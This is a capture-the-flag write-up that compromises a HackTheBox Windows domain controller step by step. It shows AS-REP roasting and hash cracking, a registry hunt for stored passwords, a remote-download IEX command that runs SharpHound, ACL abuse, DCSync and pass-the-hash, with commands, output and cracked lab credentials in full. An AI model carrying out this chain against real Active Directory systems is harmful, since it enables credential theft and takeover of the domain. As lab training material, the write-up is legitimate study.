HackTheBox Sauna Writeup – 10.10.10.175

HackTheBox Sauna (10.10.10.175) is a Windows box released on 15th February 2020. The machine is rated easy and is worth 20 points. Since most Windows boxes follow a similar path for initial foothold and enumeration, users who have already completed machines like Forest, Nest, Sniper and Resolute are going to have a good time.


Welcome back, here is my walkthrough of the Sauna Windows machine. I used the usual tools: Evil-WinRM, Impacket's GetNPUsers, BloodHound with Neo4j, and John the Ripper. These are the same tools I used on the previous HackTheBox Windows machines.

SCANNING AND GETTING FOOTHOLD

Let us begin. As always, I added the machine IP to /etc/hosts as sauna.htb and proceeded with the nmap scan.

# root @ ns09 in ~/htb/sauna [11:52:48] 
$ nmap -sV -sC -oA nmap sauna.htb    
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 12:12 +03
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 12:13 (0:00:06 remaining)
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 12:13 (0:00:07 remaining)
Nmap scan report for sauna.htb (10.10.10.175)
Host is up (0.12s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-17 17:14:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/17%Time=5E4A58F6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-17T17:16:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.55 seconds

# root @ ns09 in ~/htb/sauna [12:16:17] 

The scan reveals the classic Active Directory domain controller port set: DNS (53), Kerberos (88), RPC (135), SMB (139/445), LDAP (389) and the Global Catalog (3268/3269), plus a web server on 80. Nmap even reports the domain name, EGOTISTICAL-BANK.LOCAL, and the host name SAUNA. Two details worth noting for later: SMB signing is required (so NTLM relay to SMB is off the table), and the clock skew is about 8 hours, which matters as soon as Kerberos authentication is involved (Kerberos tolerates only about 5 minutes of skew; sync with ntpdate or wrap the tool in faketime when a Kerberos step fails with a skew error). Visiting the default website on port 80 shows the site of "Egotistical Bank".

I tried enum4linux to gather usernames, but it couldn't find any: anonymous SMB/RPC enumeration gives nothing on this box. So I moved on to another way of getting users, and the plan was a "guessing game".

The "Meet The Team" section of the website lists a number of employees, and this page will probably help me move forward. BUT, the names are listed in "FirstName LastName" format, and I highly doubt an organization would use full names as its Active Directory naming standard, so I need to test some username conventions before the next step.

What I planned was to build my own user list from the candidate usernames derived from those names and feed it to the Impacket tool GetNPUsers.py. This is the same tool I used on previous boxes like Forest and Resolute. As you may already know, GetNPUsers sends an AS-REQ without pre-authentication for each name; the KDC only answers with an AS-REP for accounts flagged DONT_REQUIRE_PREAUTH, and the encrypted part of that reply is derived from the user's password, so it can be cracked offline (AS-REP roasting).
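The user-list step above is exactly where most of the time goes on this box, so here is an added example of how I would generate the candidate list programmatically. This is my own code, not code from the original write-up; the names in SAMPLE_NAMES are constructed placeholders rather than the names from the target's website, and the username conventions are an assumption about what the target might use.

```python
"""Generate Active Directory username candidates from employee full names.

Added example, not code from the original write-up. The names in SAMPLE_NAMES
are constructed placeholders; the username conventions are common ones and
are an assumption about what the target might use, so extend them as needed.
"""
import re


def candidates(full_name):
    """Return common AD username forms for one 'First [Middle] Last' name."""
    # Keep letters/digits only so "O'Brien" becomes "obrien" (assumed convention).
    parts = [re.sub(r"[^a-z0-9]", "", p) for p in full_name.lower().split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]
    f, l = first[0], last[0]
    forms = [
        f + last,            # jsmith
        first + last,        # janesmith
        first + "." + last,  # jane.smith
        f + "." + last,      # j.smith
        first + "_" + last,  # jane_smith
        last + f,            # smithj
        last + "." + first,  # smith.jane
        first + l,           # janes
        first,               # jane
        last,                # smith
    ]
    out = []
    for u in forms:
        if u not in out:
            out.append(u)
    return out


def build_userlist(names):
    """Flatten candidates for every name, keeping order and dropping duplicates."""
    out = []
    for name in names:
        for u in candidates(name):
            if u not in out:
                out.append(u)
    return out


# Constructed sample input: these are not the names from the target's website.
SAMPLE_NAMES = ["Fiona Smith", "Hugh Smith", "Mary O'Brien"]

if __name__ == "__main__":
    # One candidate per line is exactly what GetNPUsers.py -usersfile expects.
    print("\n".join(build_userlist(SAMPLE_NAMES)))
```

Redirect the output to users.txt and pass it to GetNPUsers.py with -usersfile. The run doubles as a username oracle: an existing account that still requires pre-authentication makes the KDC answer KDC_ERR_PREAUTH_REQUIRED, while a name that does not exist gets KDC_ERR_C_PRINCIPAL_UNKNOWN, so you learn which conventions are real even when no account is roastable.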

After running GetNPUsers.py against the domain egotistical-bank.local, I obtained an AS-REP hash for the user FSmith (again ;)). The remaining candidates returned nothing usable, so at this point I have only one user to work with.

# root @ ns09 in ~/htb/sauna [13:26:03] 
$ python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile tgt.txt
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
# root @ ns09 in ~/htb/sauna [13:26:12] 
$ cat tgt.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:8eacea1db05686ae8831df5e29827d6a$[...]
# root @ ns09 in ~/htb/sauna [13:26:19] 

In the next step, I used John to crack the hash with rockyou.txt as the wordlist. John took about 40 seconds to crack it and revealed the password: "Thestrokes23". (The hash is in the hashcat-style format with the "$23$" etype marker; John's krb5asrep format loads it as-is, so no conversion is needed.)

# root @ ns09 in ~/htb/sauna [13:37:29] 
$ john tgt.txt -wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:41 DONE (2020-02-17 13:38) 0.02409g/s 253952p/s 253952c/s 253952C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# root @ ns09 in ~/htb/sauna [13:38:14] 

EvilWinRM to Get the User

As I already have the user FSmith’s credentials, my next approach is to get the shell using EvilWinRm.

# root @ ns09 in ~/htb/sauna [13:43:13] 
$ ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i sauna.htb
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
    Directory: C:\Users\FSmith\Desktop
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        1/23/2020  10:03 AM             34 user.txt                                                                                                                                                                                                
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
1b5520[------------]af70cf
*Evil-WinRM* PS C:\Users\FSmith\Desktop> 

I successfully logged in as FSmith and obtained user.txt from his desktop.

Privilege Escalation

A quick look showed that FSmith is not an admin, so I need to find the right user or service to gain more authority on the system. I used the PowerShell cmdlet Get-LocalUser to list the accounts on the server. Since this host is the domain controller, the "local" SAM is the AD database itself, which is why domain accounts such as krbtgt and the service account show up here.

# root @ ns09 in ~/htb/sauna [13:51:27] 
$ ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i sauna.htb
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> Get-LocalUser
Name          Enabled Description                                             
----          ------- -----------                                             
Administrator True    Built-in account for administering the computer/domain  
Guest         False   Built-in account for guest access to the computer/domain
krbtgt        False   Key Distribution Center Service Account                 
HSmith        True                                                            
FSmith        True                                                            
svc_loanmgr   True 

I was stuck again after listing the users, so I decided to pick up some tips from the HTB forum. A user there pointed me in the right direction.

Gathering Credentials From The Registry

The Windows Registry stores configuration used by the system and by other programs. An attacker can query the registry and find credentials that were stored for auto-run programs or services; the most common case is Windows automatic logon, where the Winlogon key holds DefaultUserName and DefaultPassword in clear text so the machine can log a user in without prompting.

The following commands search each hive recursively (/s) for string values (/t REG_SZ) whose key, value name or data contains "password" (/f):

Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
Current User Hive: reg query HKCU /f password /t REG_SZ /s 

Here is the snipped result of running the command against the local machine hive:

*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415}
    (Default)    REG_SZ    Picture Password Enrollment UX

-------SNIP------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

-----SNIP--------------

End of search: 283 match(es) found.
*Evil-WinRM* PS C:\Users\FSmith\Documents> 
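A search like the one above returns hundreds of matches, most of them noise such as the "Picture Password Enrollment UX" CLSID entry, because /f matches the data as well as the value name. As an added example that is not part of the original write-up, the script below parses reg query output and keeps only values whose name indicates a stored credential and whose data is non-empty. SAMPLE_OUTPUT is constructed to resemble the page's snippet (the DefaultUserName value and the PasswordHint key are made up), and the set of "interesting" value names is an assumption based on the well-known Winlogon autologon values.

```python
"""Triage the output of 'reg query <hive> /f password /t REG_SZ /s'.

Added example, not code from the original write-up. SAMPLE_OUTPUT is
constructed to look like the page's snippet (the DefaultUserName value and the
PasswordHint key are made up); the set of "interesting" value names is an
assumption based on the well-known Winlogon autologon values.
"""
import re

# Winlogon autologon values and friends: these hold real credentials.
HIGH_VALUE = {"defaultusername", "defaultdomainname", "defaultpassword",
              "altdefaultusername", "altdefaultpassword", "autoadminlogon"}

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.*)$")
VALUE_RE = re.compile(r"^\s+(.+?)\s+(REG_SZ|REG_EXPAND_SZ|REG_MULTI_SZ)\s*(.*)$")

# Constructed sample output in the layout reg.exe prints.
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415}
    (Default)    REG_SZ    Picture Password Enrollment UX

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultUserName    REG_SZ    BANK\autologon_svc
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVendor\Agent
    PasswordHint    REG_SZ

End of search: 4 match(es) found.
"""


def parse_reg_query(text):
    """Yield (key, value_name, data) for every string value in reg query output."""
    key = None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), m.group(3).strip()


def find_credentials(text):
    """Keep values whose NAME says credential and whose data is non-empty.

    This drops matches like '(Default) = Picture Password Enrollment UX',
    where only the data happened to contain the word 'password'."""
    hits = []
    for key, name, data in parse_reg_query(text):
        lname = name.lower()
        if not data:
            continue
        if lname in HIGH_VALUE or "password" in lname:
            hits.append({"key": key, "name": name, "data": data})
    return hits


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_OUTPUT):
        print(f"{hit['key']}\n    {hit['name']} = {hit['data']}")
```

Pipe the real output into it (for example save the Evil-WinRM session output to a file on your own machine and run the script over it). Also query the Winlogon key directly rather than relying on the keyword search, since DefaultUserName does not contain the word "password": reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName tells you which account the stored password belongs to.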

I tried the password against Administrator, which unfortunately didn't work, but it was accepted for the user svc_loanmgr. I successfully logged in to the box as svc_loanmgr. (A cleaner check than guessing: the same Winlogon key normally holds a DefaultUserName value next to DefaultPassword, which says which account the stored password belongs to.)

# root @ ns09 in ~/htb/sauna [14:40:04] 
$ ruby evil-winrm.rb -u administrator -p 'Moneymakestheworldgoround!' -i sauna.htb
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
Error: Can't establish connection. Check connection params
Error: Exiting with code 1
# root @ ns09 in ~/htb/sauna [14:40:38] C:1
$ ruby evil-winrm.rb -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i sauna.htb  
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 

The next step was clear to me: I had done the box Forest with BloodHound and Neo4j, so I decided to reuse that experience here.

Command:

powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.4:8000/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
# root @ ns09 in ~/htb/sauna [14:48:29] 
$ ruby evil-winrm.rb -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i sauna.htb  

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.4:8000/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 11:51 AM on 2/17/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ∞/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4445557
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish

Compressing data to C:\Users\svc_loanmgr\Documents\20200217115111_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> dir

    Directory: C:\Users\svc_loanmgr\Documents

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        2/17/2020  11:51 AM           7865 20200217115111_BloodHound.zip                                                                                                                                                                           
-a----        2/17/2020  11:51 AM           7297 U0FVTkE=.bin                                                                                                                                                                                            


*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> 
Info: Exiting...

# root @ ns09 in ~/htb/sauna [14:49:48] C:130
$ 

The zip file "20200217115111_BloodHound.zip" was created successfully (the U0FVTkE=.bin file next to it is SharpHound's cache file).

I downloaded the zip from the svc_loanmgr folder and imported it into BloodHound. Analysing it in BloodHound and Neo4j, I found that only the Administrator account and the members of the Administrators group have a direct path to Domain Admin; our user svc_loanmgr is a member of neither.

So, one more roadblock. I went back to the HTB forum looking for tips, and one of the users mentioned aclpwn.py. This tool integrates with BloodHound so that an attacker can identify and exploit ACL-based privilege escalation paths inside a Windows domain.

DCSync

Here is how I did it: I ran BloodHound and then aclpwn.py, after a few failed attempts.

With that, svc_loanmgr held the rights needed to continue: the two control-access rights DCSync depends on, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object (BloodHound calls them GetChanges and GetChangesAll). A principal holding both can ask the domain controller to replicate account secrets over the directory replication protocol exactly as another DC would, which is what Impacket's secretsdump.py does. I used it to pull the Administrator password hash. On the defensive side this leaves a clear trace: Event ID 4662 on the DC with those two replication GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) for a source account that is not a domain controller.

And here we have Root

As I have the hash, I will skip cracking it: Evil-WinRM accepts the NT hash directly through its -H option (pass-the-hash), so I ran Evil-WinRM again as Administrator with the hash and got root.

That’s all folks…

Thank you for reading :), See you again with another HTB write-up soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

3 Comments
Rac00n
6 months ago

Very interesting, I didn’t use ACL privesc but went for winPEAS to get the svc password, and later continued with mimikatz for the admin hash. Thank you for posting your way of doing it.

cyruslab
6 months ago

Hi, thanks for this share as this provides me an alternative approach to get administrator’s hash. I was stuck with initial foothold as GetNPUsers.py, rpcclient -U “” -N 10.10.10.175, and enum4linux -a 10.10.10.175 all did not return anything.. then I did another round of nmap on port 389 with ldap* script, I got a lot of information, so I gathered all the usernames from the script and used GetNPUsers.py again, but again nothing. So I proceeded to go to the forum, I read an hour of the forum post.. and I repeatedly see f***h, and someone gave me a hint to…
